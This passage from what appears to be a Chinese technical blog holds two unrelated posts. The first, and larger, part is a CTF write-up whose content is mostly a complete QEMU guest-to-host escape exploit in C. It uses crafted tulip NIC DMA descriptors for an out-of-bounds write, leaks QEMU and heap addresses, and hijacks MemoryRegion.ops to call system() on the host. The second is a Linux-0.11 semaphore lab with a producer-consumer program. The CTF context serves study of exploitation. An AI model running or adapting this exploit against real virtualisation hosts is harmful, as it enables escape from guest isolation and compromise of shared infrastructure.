sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 设置tx_desc(覆盖TULIPState) */

sleep(1);
uint64_t *binsh = (uint64_t *)malloc(0x200);
binsh[0] = 7449354444534473059; // catflag
binsh[1] = 0;
len1 = 16;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(binsh);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
printf("[*] enter stage3\n"); {
((uint64_t *)buf)[0] = qemu_plt_system;
((uint64_t *)buf)[1] = qemu_plt_system;

((uint64_t *)buf)[2] = 0;
((uint64_t *)buf)[3] = 0;

((uint64_t *)buf)[4] = 2;
((uint64_t *)buf)[5] = 0;

((uint64_t *)buf)[6] = 0;
((uint64_t *)buf)[7] = 0;

((uint64_t *)buf)[8] = 0x0000000400000004;
((uint64_t *)buf)[9] = 0;

((uint64_t *)buf)[10] = 0;
((uint64_t *)buf)[11] = 0;
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
/* (1UL << 29)为TDES1_FS: 执行"tx_frame_len = 0" */
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

pmio_writel(CSR(6), 1u << 13); /* (1u << 13)为CSR6_ST: 设置CSR5_TS_SUSPENDED */

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x400 */

printf("[*] fill tx_frame\n");

sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); /* 读取tx_desc为网络适配器的描述符,tx_frame_len将变为0x800 */

printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x2a28-0x70; // 指向MemoryRegion.ops
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* 设置tx_desc(覆盖TULIPState) */

sleep(1);
printf("[*] hijack ops\n");
uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
fake_memory_region_ops[0] = frame_base;
len1 = 8;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa); /* 覆盖ops.write */

pmio_writel(CSR(4), tx_desc_gpa); /* 触发ops.write */
}

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <assert.h>
#include <inttypes.h>
#include <sys/io.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT) // 4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)

#define PMIO_BASE 0x000000000000c000
#define CSR(_x) ((_x) << 3)
#define CSR5_TS_SUSPENDED 6

#if 0

tulip_write ->
tulip_xmit_list_update ->
tulip_copy_tx_buffers ->
pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1); ->

static uint32_t tulip_ts(TULIPState *s)
{
return (s->csr[5] >> CSR5_TS_SHIFT) & CSR5_TS_MASK;
}

#endif

struct tulip_descriptor {
uint32_t status;
uint32_t control;
uint32_t buf_addr1;
uint32_t buf_addr2;
};

int fd;

uint32_t page_offset(uint32_t addr) {
return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr) {
uint64_t pme, gfn;
size_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PFN_PFN;
return gfn;
}

uint64_t gva_to_gpa(void *addr) {
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

uint64_t pmio_read(uint64_t port) {
uint64_t val;
val = inw(PMIO_BASE + port);
return val;
}

void pmio_write(uint64_t port, uint64_t val) {
outw(val, PMIO_BASE + port);
}

void pmio_writel(uint64_t port, uint64_t val) {
outl(val, PMIO_BASE + port);
}

int main(int argc, char **argv) {
printf("[*] enter stage1\n");
int ret = 0;
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}
iopl(3);

// allocate descriptor
struct tulip_descriptor *tx_desc = malloc(sizeof(struct tulip_descriptor));
struct tulip_descriptor *rx_desc = malloc(sizeof(struct tulip_descriptor));

char *recv_buf = malloc(0x9000);
char *buf = malloc(0x1000);
memset(buf, 'A', 0x1000);
memset(recv_buf, 'B', 0x9000);

int len1 = 0x400 << 0;
int len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24); // TDES1_FS, clean tx_frame_len
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

// get the physical address of the descriptor
uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// set CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len should be 0x400 now

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len shoule be 0x800 now

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1u << 1)); // CSR6_OM_SHIFT trigger tulip_receive

sleep(1);
printf("[*] OOB write tx_frame_len...\n");

int rx_len1, rx_len2;
rx_len1 = 0x400;
rx_len2 = 0;
rx_desc->status = (1UL << 31) | (1UL << 24); // RDES0_OWN
rx_desc->buf_addr1 = gva_to_gpa(recv_buf);
rx_desc->buf_addr2 = 0x180;
rx_desc->control = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);

// set rx descriptor
sleep(1);
uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
pmio_writel(CSR(3), rx_desc_gpa);

struct oob_data { // control the following fields in TULIPState
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
};
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = 0x800 - len1;
oob_data->rx_frame_len = 0x900;
oob_data->rx_frame_size = 2048*2 + 0x900;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 'A';
oob_data->filter[i][1] = 'A';
oob_data->filter[i][2] = 'A';
oob_data->filter[i][3] = 'A';
oob_data->filter[i][4] = 'A';
oob_data->filter[i][5] = 'A';
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24) | (1UL << 30);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[+] leak\n");
char *cur = (char *)recv_buf;
for (int i = 0; i < 50; ++i) {
printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur+8));
cur += 16;
}
cur = (char *)recv_buf;
uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
uint64_t qemu_plt_system = qemu_base+2859620;
uint64_t frame_base = heap_base+0xe0fcf0;
printf("[*] continue...\n");
printf("[+] qemu_base: 0x%lx\n", qemu_base);
printf("[+] heap_base: 0x%lx\n", heap_base);

printf("[*] enter stage2\n"); {
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x3350 - 0x70;
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

sleep(1);
uint64_t *binsh = (uint64_t *)malloc(0x200);
binsh[0] = 7449354444534473059; // catflag
binsh[1] = 0;
len1 = 16;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(binsh);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);
}

// now control MemoryRegion.ops
printf("[*] enter stage3\n"); {
((uint64_t *)buf)[0] = qemu_plt_system;
((uint64_t *)buf)[1] = qemu_plt_system;

((uint64_t *)buf)[2] = 0;
((uint64_t *)buf)[3] = 0;

((uint64_t *)buf)[4] = 2;
((uint64_t *)buf)[5] = 0;

((uint64_t *)buf)[6] = 0;
((uint64_t *)buf)[7] = 0;

((uint64_t *)buf)[8] = 0x0000000400000004;
((uint64_t *)buf)[9] = 0;

((uint64_t *)buf)[10] = 0;
((uint64_t *)buf)[11] = 0;
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x2a28-0x70; // now points to the MemoryRegion.ops
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

sleep(1);
printf("[*] hijack ops\n");
uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
fake_memory_region_ops[0] = frame_base;
len1 = 8;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);

// trigger the ops.write
pmio_writel(CSR(4), tx_desc_gpa);
}

return 0;
}

小结:

刚刚入门 qemu 逃逸,理解并调试了下别人的 exp(本题目没有移除调试符号,调试起来还是很轻松的)

HIT-OSLab5

实验目的:

  • 加深对进程同步与互斥概念的认识
  • 掌握信号量的实现原理两种(不同的实现方式)
  • 掌握信号量的使用,并应用它解决生产者-消费者问题

实验内容:

  • 在 Linux-0.11 中实现信号量,具体来说就是实现如下4个系统调用:
    • sys_sem_open:用于打开一个信号量文件描述符
    • sys_sem_wait:等待一个信号量的释放
    • sys_sem_post:释放一个信号量
    • sys_sem_unlink:删除一个信号量
  • 在 Ubuntu 下编写程序,用已经实现的信号量解决生产者-消费者问题

实验过程

进程同步与互斥是操作系统中实现进程间通信和同步的基本机制,它们的主要目的是确保在多个进程之间共享资源时,能够正确地保持同步状态,避免竞争条件和数据不一致等问题

  • 进程同步是指在多个进程之间同步数据访问,确保同一时刻只有一个进程可以访问共享资源
  • 进程互斥是指在多个进程之间同步对共享资源的互斥访问,确保同一时刻只有一个进程可以访问共享资源

进程同步和互斥可以通过不同的同步原语来实现,例如:锁(Lock)、信号量(Semaphore)、条件变量(ConditionVariable)

  • 锁:有两种实现方式,基于原子操作和基于信号量
  • 信号量:核心结构为一个整数和一个等待队列
  • 条件变量:在满足特定条件时通知进程,使其可以访问共享资源

PV 操作是指进程之间的同步原语,用于实现进程之间的同步和通信(PV 操作是 Posix 信号量的一种实现方式)

  • P操作:信号量 —,判断是不是要阻塞
  • V操作:信号量 ++,判断是不是要唤醒

PV 操作的实现需要保证操作的原子性,而保证原子性有很多方法:

  • 这里不采用软件保护法(比如:轮换法 \ 标记法 \ peterson 算法 \ Lamport 面包店算法),而是采用硬件保护法
  • 由于是 linux-0.11 运行在单核 cpu 上(Bochs 虚拟机提供单核 cpu 环境),所以可以采用简单的开关中断的方法
  • 如果是多 cpu 环境,就使用硬件原子指令保护法(用硬件原子指令操控一个 mutex 信号量来保护临界区)

开关中断的实现需要依赖如下函数:

1
2
#define sti() __asm__ ("sti"::) // 开中断
#define cli() __asm__ ("cli"::) // 关中断

基于 PV 操作实现信号量的模板如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
P(){ 
cli();
value--; // 信号量--
if(value < 0){
schedual(); // 调度其他进程
}
sti();
}

V(){
cli();
value++; // 信号量++
if(value <= 0){
wakeup(); // 唤醒等待队列中的进程
}
sti();
}
  • 信号量 > 0 时,信号量代表临界区中拥有的资源数目
  • 信号量 < 0 时,信号量代表等待队列中的进程数目

本实验要求我们实现信号量,定义信号量的数据结构如下:(在 /include/unistd.h 中)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#define QUE_LEN 16

struct semaphore_queue{
int front;
int rear;
struct task_struct *wait_tasks[QUE_LEN];
};
typedef struct semaphore_queue sem_queue;

struct semaphore_t{
int value; /* 信号量计数器 */
char name[20]; /* 信号量名称 */
struct semaphore_queue wait_queue; /* 等待队列 */
};
typedef struct semaphore_t sem_t;
  • wait_tasks[QUE_LEN] 为静态列表,索引 front / rear 分别表示其头部 / 尾部的位置

首先我们需要添加信号量的系统调用号:(在 /include/unistd.h 中)

1
2
3
4
#define __NR_sem_open 	72
#define __NR_sem_wait 73
#define __NR_sem_post 74
#define __NR_sem_unlink 75
  • 需要注意的是:这里同时需要修改 hdc-0.11.img 中的 hdc/usr/include/unistd.h 文件,如果想在虚拟机中使用 gcc 编译的话,会导入虚拟机 hdc/usr/include/ 中的文件为头文件

接着修改系统调用号的总数:(在 /kernel/system_call.s 中)

1
nr_system_calls = 76

最后添加新的系统调用定义:(在 /include/linux/sys.h 中)

1
2
3
4
5
6
extern int sys_sem_open();
extern int sys_sem_wait();
extern int sys_sem_post();
extern int sys_sem_unlink();

fn_ptr sys_call_table[] = {......,sys_sem_open,sys_sem_wait,sys_sem_post,sys_sem_unlink};

头文件以及全局变量:(在 /kernel 中新建文件 sem.c

1
2
3
4
5
6
7
8
9
#define __LIBRARY__  
#include <unistd.h>
#include <linux/sched.h>
#include <linux/kernel.h>
#include <asm/segment.h>
#include <asm/system.h>

#define SEM_COUNT 32
sem_t semaphores[SEM_COUNT];

基础字符串函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int strcmp_sem(char* name,char* tmp){
int i;
for(i = 0; i<20; i++){
if(name[i] != tmp[i])
return 0;
if(tmp[i] =='\0' && name[i] == '\0') break;
}
return 1;
}

int strcpy_sem(char* name,char* tmp){
int i;
for(i = 0; i<20; i++){
name[i] = tmp[i];
if(tmp[i] =='\0') break;
}
return i;
}

插入 / 获取 task_struct 结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
struct task_struct * get_task(sem_t* q)
{
if(q->wait_queue.front == q->wait_queue.rear) {
printk("Queue is empty!\n");
return NULL;
}
struct task_struct *tmp = q->wait_queue.wait_tasks[q->wait_queue.front];
q->wait_queue.front = (q->wait_queue.front+1)%QUE_LEN;
return tmp;
}

int insert_task(struct task_struct *p,sem_t* q)
{
if((q->wait_queue.rear+1)%QUE_LEN == q->wait_queue.front){
printk("Queue is full!\n");
return -1;
}
q->wait_queue.wait_tasks[q->wait_queue.rear] = p;
q->wait_queue.rear = (q->wait_queue.rear+1)%QUE_LEN;
return 1;
}
  • 使用静态队列 FIFO

系统调用 sys_sem_open:打开一个信号量文件描述符

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
int sys_sem_open(const char* name,unsigned int value)
{
char tmp[20];
char c;
int i;

for( i = 0; i<20; i++){
c = get_fs_byte(name+i);
tmp[i] = c;
if(c =='\0') break;
}
if(c >= 20) {
printk("Semaphore name is too long!");
return -1;
}

for(i = 0; i < SEM_COUNT; i++){
if(strcmp_sem(&semaphores[i].name,tmp)){
printk("sem %s is exist\n", semaphores[i].name);
return i;
}
}
for(i = 0; i < SEM_COUNT; i++){
if(semaphores[i].name[0] == '\0'){
strcpy_sem(semaphores[i].name,tmp);
semaphores[i].value = value;
semaphores[i].wait_queue.front = 0;
semaphores[i].wait_queue.rear = 0;
printk("create sem %s done\n",tmp);
return i;
}
}
printk("Numbers of semaphores are limited!\n");
return -1;
}

系统调用 sys_sem_wait:P 操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int sys_sem_wait(int i){
cli();
if(i < 0 || i > SEM_COUNT){
sti();
printk("sem (P) error\n");
return -1;
}
sem_t* sem = &semaphores[i];
sem->value--;
if(sem->value < 0){
current->state = TASK_UNINTERRUPTIBLE;
insert_task(current,sem);
schedule();
}
sti();
return 0;
}

系统调用 sys_sem_post:V 操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
int sys_sem_post(int i)
{
cli();
if(i < 0 || i > SEM_COUNT){
sti();
printk("sem (V) error\n");
return -1;
}
sem_t* sem = &semaphores[i];
struct task_struct *p;
sem->value++;
if(sem->value <= 0){
p = get_task(sem);
if(p != NULL){
p->state = TASK_RUNNING;
}
}
sti();
return 0;
}

系统调用 sys_sem_unlink:删除一个信号量文件描述符

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
int sys_sem_unlink(const char *name)  
{
char tmp[20];
char c;
int i,j;
for( i = 0; i<20; i++){
c = get_fs_byte(name+i);
tmp[i] = c;
if(c =='\0') break;
}
if(c >= 20) {
printk("Semphore name is too long!");
return -1;
}

for(i = 0;i< SEM_COUNT; i++){
if(strcmp(semaphores[i].name,tmp) == 0){
printk("sem %s is unlinked\n",semaphores[i].name);
semaphores[i].name[0] = '\0';
semaphores[i].value = 0;
semaphores[i].wait_queue.front = 0;
semaphores[i].wait_queue.rear = 0;
for(j = 0;j<QUE_LEN; j++){
semaphores[i].wait_queue.wait_tasks[j] = NULL;
}
return 0;
}
}
return -1;
}

修改 makefile:

1
2
3
4
5
OBJS  = sched.o system_call.o traps.o asm.o fork.o \
panic.o printk.o vsprintf.o sys.o exit.o \
signal.o mktime.o sem.o

sem.s sem.o: sem.c ../include/linux/kernel.h ../include/unistd.h

实验的最后我们需要使用信号量来解决生产者-消费者问题

消费者模型是一种用于描述消费者行为和系统性能的模型:系统中有一组生产者进程和一组消费者进程,生产者进程每次生产一个产品放入缓冲区,消费者每次从缓冲区中取出一个产品并使用,生产者、消费者共享一个初始为空、大小为 n 的缓冲区

  • 只有缓冲区没满时,生产者才能把产品放入缓冲区,否则必须等待
  • 只有缓冲区不为空时,消费者才能从中取出产品,否则必须等待
  • 缓冲区是临界资源,各进程必须互斥的访问

生产者-消费者模型代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#define   __LIBRARY__
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>

_syscall2(int,sem_open,const char *,name,unsigned int,value);
_syscall1(int,sem_wait,int,sem);
_syscall1(int,sem_post,int,sem);
_syscall1(int,sem_unlink,const char *,name);

const int consumerNum = 3;
const int itemNum = 6;
const int bufSize = 10;
int buf_in = 0,buf_out = 0;

int main()
{
int sem_empty, sem_full, sem_mutex;
int stat;
pid_t p;
int i,j,k,fd;

if((sem_empty = sem_open("empty",1)) < 0){
perror("empty error!\n");
return -1;
}

if((sem_full = sem_open("full",0)) < 0){
perror("full error!\n");
return -1;
}

if((sem_mutex = sem_open("mutex",10)) < 0){
perror("mutex error!\n");
return -1;
}

fd = open("buffer.dat", O_CREAT | O_RDWR | O_TRUNC, 0666);

if(!(p = fork())){
printf("A(%d) create\n",0);
for(i = 0; i < itemNum; i++){
sem_wait(sem_empty);
sem_wait(sem_mutex);

printf("A(%d) >> buf_in:%d\n",0,buf_in);
lseek(fd, buf_in * sizeof(int), SEEK_SET);
write(fd, (char *)&buf_in, sizeof(int));
buf_in = (buf_in+1) % bufSize;

sem_post(sem_mutex);
sem_post(sem_full);
}
printf("A(%d) done\n",0);
return 0;
}
else if(p < 0){
perror("fork error!\n");
return -1;
}

for(j = 0; j < consumerNum; j++){
if(!(p = fork())){
printf("B(%d) create\n",j);
for(k = 0; k < itemNum/consumerNum; k++){
sem_wait(sem_full);
sem_wait(sem_mutex);

lseek(fd, bufSize * sizeof(int), SEEK_SET);
read(fd, (char *)&buf_out, sizeof(int));
printf("B(%d) >> buf_out:%d\n",j,buf_out);

buf_out = (buf_out + 1) % bufSize;
lseek(fd, bufSize * sizeof(int), SEEK_SET);
write(fd, (char *)&buf_out, sizeof(int));

sem_post(sem_mutex);
sem_post(sem_empty);

}
printf("B(%d) done\n",j);
return 0;
}
else if(p < 0){
perror("fork error!\n");
return -1;
}
}

while ((wait(&stat)) > 0);
sem_unlink("empty");
sem_unlink("full");
sem_unlink("mutex");

puts("all done");
return 0;
}

最终效果如下: